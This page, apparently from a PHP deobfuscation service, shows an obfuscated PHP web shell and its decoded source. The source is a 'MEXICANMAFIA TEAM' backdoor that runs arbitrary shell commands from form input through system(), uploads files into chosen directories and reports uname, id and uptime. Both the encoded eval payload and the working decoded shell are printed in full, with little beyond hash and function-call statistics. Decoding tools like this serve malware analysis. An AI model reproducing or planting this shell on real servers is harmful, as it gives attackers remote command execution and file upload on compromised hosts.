Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(stripslashes(gzinflate(base64_decode("rVZtb6NGEP5uyf9hTdNLIp1DclKrysZEbkx66OLYA..
Decoded Output download
?>
<?php
set_magic_quotes_runtime(0);
print "<body bgcolor=\"#C0C0C0\">";
print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
print "<center><h1>MEXICANMAFIA TEAM</h1></center>";
print "<hr><hr>";
$currentWD = str_replace("\","\",$_POST['_cwd']);
$currentCMD = str_replace("\","\",$_POST['_cmd']);
$UName = `uname -a`;
$SCWD = `pwd`;
$UserID = `id`;
$UptimeOs = `uptime`;
if( $currentWD == "" ) {
$currentWD = $SCWD;
}
print "<table>";
print "<tr><td><b>My IP:</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
print "<tr><td><b>uname -a:</b></td><td>$UName</td></tr>";
print "<tr><td><b>ID:</b></td><td>$UserID</td></tr>";
print "<tr><td><b>UPTIME:</b></td><td>$UptimeOs</td></tr>";
print "</table>";
print "<hr><hr>";
if( $_POST['_act'] == "List files!" ) {
$currentCMD = "ls -la";
}
print "<form method=post enctype=\"multipart/form-data\"><table>";
print "<tr><td><b>CMD:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
print "<td><input type=submit name=_act value=\"Shoot!\"></td></tr>";
print "<tr><td><b>PWD:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
print "<td><input type=submit name=_act value=\"ls -al\"></td></tr>";
print "<tr><td><b>Inject:</b></td><td><input size=85 type=file name=_upl></td>";
print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
print "</table></form><hr><hr>";
$currentCMD = str_replace("\"","\"",$currentCMD);
$currentCMD = str_replace("\'","\'",$currentCMD);
if( $_POST['_act'] == "Upload!" ) {
if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
print "<center><b>fuckers blocked us try again!</b></center>";
} else {
print "<center><pre>";
system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
print "</pre><b>File uploaded baby good work!</b></center>";
}
} else {
print "
<!-- OUTPUT STARTS HERE -->
<pre>
";
$currentCMD = "cd ".$currentWD.";".$currentCMD;
system($currentCMD);
print "
</pre>
<!-- OUTPUT ENDS HERE -->
</center><hr><hr><center><b>ownd Baby</b></center>";
}
exit;
?>
<?Did this file decode correctly?
Original Code
<?php eval(stripslashes(gzinflate(base64_decode("rVZtb6NGEP5uyf9hTdNLIp1DclKrysZEbkx66OLYAtxUKhXhZW22ByzdXeJzo/z37i4QG78lVYuNvV7meWbmmWHwtd5uadd5nLdb7RaFzEv9BQq9vwrMIPVIkTGUwrPL8367lROUMeAqWoCjFQgWIU4wGbiuq3x3cy
leYqm7yqYpZasE6gLwPMcZ6879FCWrHiMwKMIYMpDSvrxA0d+wd/Vj/q3/EpPnJYpY3Lu6vPy+H0O0iFnvk7iiqSVf00cIMwaJrsVX+tj4zbwZ3o+Ht+YQOMZwrKl8V1MrkyYuFphqs906CQtCuNnDCIABoIx4BOaJH8IzV3HrQ/lY/VA+nnjTie387p564TJyT/8QCtUcN+PRv+VIa
w7OMrv3UyiieCwyser6j4LcvhGxie18GcmdGYXEFK4eUbWRi3JNqMTK9aOkRPMzsJHgYMDzdxVwDp7bLU7ZuAakIw57EchXtZgf7CjPuIIs0rVAH6+AOe1pasDFFjv8dJWLE882rF8Ni2doGeOJY3ifeb480Qvu/GyvwXA0skqD85JJZeSgVxuSJ0gAosc8lwvPNn+5HzozyyjZ3yav
tW9yl8V5G22OtnGyVm8DZ1PHHBvb4Kquh+DqRnUOdrhsgteO80PGlShb4Q5RBuYogbSzryvKdnaVhIJu4ku2Zm/MMUlBClmMo0GOORfMQrbKoRwOaZEwlPuEqcKsG/nMl4NC2x/zWgnutimDhrK8YECMigGfDUAUSLqQtw//Bk9+UpRbogfW4V/IW04pqbaUf+WVEdMiSBErqYVGG5R
2jDHrrHnWddgb/vTh/eEvj4T/8P9EL4rnJ++O3sz+hCE7nMBPP5QeRddU/oo8+W8hzvIE+9FbCle9rsl20g9M8SMTWKknsFhs2L9zgJ/W8NNd+LF7rE5u4/4qjW/NO8MW1lw/bs1XkBBMBLAzALPp3WQ48gzL8iZf1lBx7DwAA31ehF8hoSBIMF9EoKCAkRXwFz7KOmUtNx+FguUFwI
TCo7w5gWt7cdAVZTDlmqRPQA7b3RxYmnuixtWw3+5n9QBsA/JJ/3DFnwL9PYGpIiKe7q1ovkIKy5MN/GAFFhhHYInJ14Pp8oPPr0bWNbHrZvytdbpdMJk505kDbGdoOTb4bFgG6HZ1cVWqwQ1rxu0pGUY72fab06gCVipu9dBWPGWuW1EZ96NGTNLu9W9Qda67Ai+zCPzM1dmVRM5x+
A0x2b3XuvjUrv8B")))); ?>
Function Calls
| gzinflate | 1 |
| stripslashes | 1 |
| base64_decode | 1 |
Stats
| MD5 | 6cb212ac0bf13ea527ba4e4ff7dd534e |
| Eval Count | 1 |
| Decode Time | 83 ms |